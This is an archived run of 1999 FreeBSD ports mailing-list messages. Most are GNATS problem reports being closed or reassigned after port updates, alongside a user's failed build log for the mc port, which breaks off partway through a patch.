owner-freebsd-current@FreeBSD.ORG > [mailto:owner-freebsd-current@FreeBSD.ORG]On Behalf Of Dan Nelson > Sent: Friday, December 24, 1999 10:05 AM > To: FreeBSD > Cc: freebsd-stable@FreeBSD. ORG; freebsd-current@FreeBSD.ORG; > freebsd-ports@FreeBSD.ORG > Subject: Re: broken port... > > > In the last episode (Dec 24), FreeBSD said: > > cute one though > > > > Updater failed: Cannot install > > "/usr/ports/japanese/tk80/patches/#cvs.cvsup-1394.186" to > > "/usr/pobts/japanese/tk80/patches/patch-ab": No such file or directory > > > > /usr/pobts :) > > You didn't provide much information, but it looks like you were running > cvsup, right? If you run it again, does it have trouble on the same > file? 'b' and 'r' are one bit apart from each other (01100010 and > 01110010). Sounds like your machine flipped a bit. > > -- > Dan Nelson > dnelson@emsphone.com > Yeah, I know, it wasnt a big deal. I just thought it was funny. I re-cvsupped and it was fine. It is old hardware (p133,128,6.4gEIDE,pn0) and it very well may have flipped a bit, good call. FreeBSD freebsd@gtonet.net "LinSUX is only free if your time is worthless" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 17:26:20 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0EEE814E36; Fri, 24 Dec 1999 17:26:18 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA07301; Fri, 24 Dec 1999 17:26:17 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 24 Dec 1999 17:26:17 -0800 (PST) From: Message-Id: <199912250126.RAA07301@freefall.freebsd.org> To: steve@FreeBSD.org, freebsd-ports@FreeBSD.org, asami@FreeBSD.org Subject: Re: ports/15523: Motif/Lesstif not found when grace-5.0.3g is build Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Motif/Lesstif not found when grace-5.0.3g is build Responsible-Changed-From-To: freebsd-ports->asami Responsible-Changed-By: steve Responsible-Changed-When: Fri Dec 24 17:25:22 PST 1999 Responsible-Changed-Why: This does indeed to appear to be something related the package building environment. Pass this one to Satoshi for a look see. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 17:26:44 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 65C0D14C38; Fri, 24 Dec 1999 17:26:43 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA07405; Fri, 24 Dec 1999 17:26:43 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 24 Dec 1999 17:26:43 -0800 (PST) From: Message-Id: <199912250126.RAA07405@freefall.freebsd.org> To: steve@FreeBSD.org, freebsd-ports@FreeBSD.org, andreas@FreeBSD.org Subject: Re: ports/15477: wwwstat-2.01 port is not Y2K compliant: 19 is hardcoded. Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: wwwstat-2.01 port is not Y2K compliant: 19 is hardcoded. Responsible-Changed-From-To: freebsd-ports->andreas Responsible-Changed-By: steve Responsible-Changed-When: Fri Dec 24 17:26:32 PST 1999 Responsible-Changed-Why: Over to port's maintainer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 17:27:15 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 98B24151AB; Fri, 24 Dec 1999 17:27:14 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA07488; Fri, 24 Dec 1999 17:27:14 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 24 Dec 1999 17:27:14 -0800 (PST) From: Message-Id: <199912250127.RAA07488@freefall.freebsd.org> To: steve@FreeBSD.org, freebsd-ports@FreeBSD.org, jmz@FreeBSD.org Subject: Re: ports/15341: XF86Setup in CURRENT is broken on possibly some machines Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: XF86Setup in CURRENT is broken on possibly some machines Responsible-Changed-From-To: freebsd-ports->jmz Responsible-Changed-By: steve Responsible-Changed-When: Fri Dec 24 17:26:56 PST 1999 Responsible-Changed-Why: Over to port's maintainer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 17:28: 3 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E595114C38; Fri, 24 Dec 1999 17:28:01 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA07575; Fri, 24 Dec 1999 17:28:01 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 24 Dec 1999 17:28:01 -0800 (PST) From: Message-Id: <199912250128.RAA07575@freefall.freebsd.org> To: th@cis.ibaraki.ac.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15316: Can not install ssh2 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Can not install ssh2 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 24 17:27:26 PST 1999 State-Changed-Why: This appears to have been a transient problem that has since been fixed. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 17:28:45 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D9E2814CA4; Fri, 24 Dec 1999 17:28:44 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA07656; Fri, 24 Dec 1999 17:28:44 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 24 Dec 1999 17:28:44 -0800 (PST) From: Message-Id: <199912250128.RAA07656@freefall.freebsd.org> To: dann@greycat.com, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15426: build of devel/t1lib hangs in configure Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: build of devel/t1lib hangs in configure State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 24 17:28:12 PST 1999 State-Changed-Why: Daniel Eischen fixed the part of libc_r that was causing this problem. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 17:29:58 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id DC87714CA4; Fri, 24 Dec 1999 17:29:57 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA07741; Fri, 24 Dec 1999 17:29:57 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 24 Dec 1999 17:29:57 -0800 (PST) From: Message-Id: <199912250129.RAA07741@freefall.freebsd.org> To: Kotchourko@iket.fzk.de, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15484: 'make test' crashes in math/netcdf Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: 'make test' crashes in math/netcdf State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 24 17:29:13 PST 1999 State-Changed-Why: This appears to a problem with the software and not the port. You might have better luck contacting the author of this software about a fix. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 17:30:30 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 63C0A15047; Fri, 24 Dec 1999 17:30:29 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA07852; Fri, 24 Dec 1999 17:30:29 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 24 Dec 1999 17:30:29 -0800 (PST) From: Message-Id: <199912250130.RAA07852@freefall.freebsd.org> To: jay.krell@cornell.edu, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15514: /usr/ports/devel/t1lib hangs in configure, checking whether external symbols need an underscore prefix Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: /usr/ports/devel/t1lib hangs in configure, checking whether external symbols need an underscore prefix State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 24 17:30:05 PST 1999 State-Changed-Why: The problem in libc_r has been fixed by Daniel Eischen. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 17:31:47 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1D6CA15791; Fri, 24 Dec 1999 17:31:42 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA08055; Fri, 24 Dec 1999 17:31:42 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 24 Dec 1999 17:31:42 -0800 (PST) From: Message-Id: <199912250131.RAA08055@freefall.freebsd.org> To: jack@germanium.xtalwind.net, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15668: Update port: sysutils/asmem Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: sysutils/asmem State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 24 17:31:03 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 17:33:37 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9392215617; Fri, 24 Dec 1999 17:33:32 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA08318; Fri, 24 Dec 1999 17:33:32 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 24 Dec 1999 17:33:32 -0800 (PST) From: Message-Id: <199912250133.RAA08318@freefall.freebsd.org> To: tkato@prontomail.ne.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15666: Update port: x11-toolkits/gtkstep to 2.0 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: x11-toolkits/gtkstep to 2.0 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 24 17:32:06 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 17:35:15 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 592761557E; Fri, 24 Dec 1999 17:35:07 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA08591; Fri, 24 Dec 1999 17:35:07 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 24 Dec 1999 17:35:07 -0800 (PST) From: Message-Id: <199912250135.RAA08591@freefall.freebsd.org> To: tkato@prontomail.ne.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15665: Update port: mail/balsa to 0.6.0 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: mail/balsa to 0.6.0 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 24 17:34:21 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 17:38:14 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 429DB1577C; Fri, 24 Dec 1999 17:38:09 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA08962; Fri, 24 Dec 1999 17:38:09 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 24 Dec 1999 17:38:09 -0800 (PST) From: Message-Id: <199912250138.RAA08962@freefall.freebsd.org> To: mkamm@gmx.net, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15562: update of ports/textproc/X2html to version 0.7.2 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: update of ports/textproc/X2html to version 0.7.2 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 24 17:36:48 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 17:40: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 19903157D6; Fri, 24 Dec 1999 17:40:04 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA09179; Fri, 24 Dec 1999 17:40:03 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 24 Dec 1999 17:40:03 -0800 (PST) From: Message-Id: <199912250140.RAA09179@freefall.freebsd.org> To: alex@big.endian.de, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15559: update astro/soaimage to 1.26 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: update astro/soaimage to 1.26 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 24 17:39:07 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 17:41:55 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4E37A15272; Fri, 24 Dec 1999 17:41:44 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA09371; Fri, 24 Dec 1999 17:41:44 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 24 Dec 1999 17:41:44 -0800 (PST) From: Message-Id: <199912250141.RAA09371@freefall.freebsd.org> To: nobutaka@nobutaka.com, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15556: Additional patches for www/w3m Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Additional patches for www/w3m State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 24 17:40:54 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 17:43:32 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C2EC9155A7; Fri, 24 Dec 1999 17:43:24 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA09581; Fri, 24 Dec 1999 17:43:24 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 24 Dec 1999 17:43:24 -0800 (PST) From: Message-Id: <199912250143.RAA09581@freefall.freebsd.org> To: tkato@prontomail.ne.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15539: Update port: x11/xbanner Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: x11/xbanner State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 24 17:42:35 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 17:44:58 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A6CE71558F; Fri, 24 Dec 1999 17:44:50 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA09802; Fri, 24 Dec 1999 17:44:50 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 24 Dec 1999 17:44:50 -0800 (PST) From: Message-Id: <199912250144.RAA09802@freefall.freebsd.org> To: tkato@prontomail.ne.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15536: Update port: devel/picprog Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: devel/picprog State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 24 17:44:03 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 17:46:31 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 859E615776; Fri, 24 Dec 1999 17:46:25 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA10018; Fri, 24 Dec 1999 17:46:25 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 24 Dec 1999 17:46:25 -0800 (PST) From: Message-Id: <199912250146.RAA10018@freefall.freebsd.org> To: tkato@prontomail.ne.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15535: Update port: devel/flick to 2.1 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: devel/flick to 2.1 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 24 17:45:36 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 17:48: 3 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id BBDA715798; Fri, 24 Dec 1999 17:47:58 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA10239; Fri, 24 Dec 1999 17:47:58 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 24 Dec 1999 17:47:58 -0800 (PST) From: Message-Id: <199912250147.RAA10239@freefall.freebsd.org> To: tkato@prontomail.ne.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15534: Update port: devel/dmake Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: devel/dmake State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 24 17:47:04 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 17:50:11 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 557E21570B; Fri, 24 Dec 1999 17:50:09 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA10541; Fri, 24 Dec 1999 17:50:09 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 24 Dec 1999 17:50:09 -0800 (PST) From: Message-Id: <199912250150.RAA10541@freefall.freebsd.org> To: tkato@prontomail.ne.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15533: Update port: devel/asl to 1.41r8 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: devel/asl to 1.41r8 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 24 17:49:02 PST 1999 State-Changed-Why: Update committed, thanks!  To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 17:52: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E234C15181; Fri, 24 Dec 1999 17:52:03 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA10742; Fri, 24 Dec 1999 17:52:03 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 24 Dec 1999 17:52:03 -0800 (PST) From: Message-Id: <199912250152.RAA10742@freefall.freebsd.org> To: beaupran@iro.umontreal.ca, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15518: Patch to make xsoldier setgid games instead of setuid root Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Patch to make xsoldier setgid games instead of setuid root State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 24 17:50:51 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 17:54:23 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8695715402; Fri, 24 Dec 1999 17:54:14 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA10989; Fri, 24 Dec 1999 17:54:14 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 24 Dec 1999 17:54:14 -0800 (PST) From: Message-Id: <199912250154.RAA10989@freefall.freebsd.org> To: james@ja.ath.cx, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15473: port lang/squeak2: CC not settable. Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: port lang/squeak2: CC not settable. State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 24 17:53:19 PST 1999 State-Changed-Why: Committed, tahnks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 17:56:14 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 53B4D15651; Fri, 24 Dec 1999 17:56:04 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA11208; Fri, 24 Dec 1999 17:56:04 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 24 Dec 1999 17:56:04 -0800 (PST) From: Message-Id: <199912250156.RAA11208@freefall.freebsd.org> To: dirk.meyer@dinoex.sub.org, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15459: news/cnews for for gawk Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: news/cnews for for gawk State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 24 17:54:49 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 17:59:13 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1E647151F4; Fri, 24 Dec 1999 17:58:40 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA11513; Fri, 24 Dec 1999 17:58:40 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 24 Dec 1999 17:58:40 -0800 (PST) From: Message-Id: <199912250158.RAA11513@freefall.freebsd.org> To: lioux@linf.unb.br, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15443: Updated port: devel/t1lib from 0.9.2 to 1.0 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Updated port: devel/t1lib from 0.9.2 to 1.0 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 24 17:57:25 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 18: 0: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1596714C4A for ; Fri, 24 Dec 1999 18:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA11677; Fri, 24 Dec 1999 18:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Fri, 24 Dec 1999 18:00:01 -0800 (PST) Message-Id: <199912250200.SAA11677@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: Vincent Poy Subject: Re: ports/15676: mc port build fails after commit by nakai Reply-To: Vincent Poy Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15676; it has been noted by GNATS. From: Vincent Poy To: Chris Piazza Cc: FreeBSD-gnats-submit@FreeBSD.ORG, nakai@FreeBSD.ORG Subject: Re: ports/15676: mc port build fails after commit by nakai Date: Fri, 24 Dec 1999 15:55:29 -1000 (HST) On Fri, 24 Dec 1999, Chris Piazza wrote: I tried the patch but the problem is still there... root@earth [5:53pm][/usr/ports/misc/mc] >> make clean ; make install ===> Cleaning for gettext-0.10.35 ===> Cleaning for libtool-1.3.3 ===> Cleaning for glib-1.2.6 ===> Cleaning for libtool-1.3.3 ===> Cleaning for gmake-3.78.1 ===> Cleaning for mc-4.5.42 ===> Extracting for mc-4.5.42 >> Checksum OK for mc-4.5.42.tar.gz. ===> mc-4.5.42 depends on executable: gmake - found ===> mc-4.5.42 depends on shared library: glib12.3 - found ===> mc-4.5.42 depends on shared library: intl.1 - found ===> Patching for mc-4.5.42 ===> Applying FreeBSD patches for mc-4.5.42 1 out of 2 hunks failed--saving rejects to vfs/extfs/uzip.in.rej *** Error code 1 Stop in /usr/ports/misc/mc. *** Error code 1 Stop in /usr/ports/misc/mc. *** Error code 1 Stop in /usr/ports/misc/mc. *** Error code 1 Stop in /usr/ports/misc/mc. *** Error code 1 Stop in /usr/ports/misc/mc. *** Error code 1 Stop in /usr/ports/misc/mc. Cheers, Vince - vince@WURLDLINK.NET - Vice President ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] WurldLink Corporation / / / / | / | __] ] San Francisco - Honolulu - Hong Kong / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] Almighty1@IRC - oahu.DAL.NET Hawaii's DALnet IRC Network Server Admin > On Fri, Dec 24, 1999 at 02:02:23PM -1000, Vincent Poy wrote: > > 1 out of 2 hunks failed--saving rejects to vfs/extfs/uzip.in.rej > > This patch should fix your problem. It appears that the author(s) > of this program fixed it in a different way. > > Index: patches/patch-ai > =================================================================== > RCS file: /home/ncvs/ports/misc/mc/patches/patch-ai,v > retrieving revision 1.2 > diff -u -r1.2 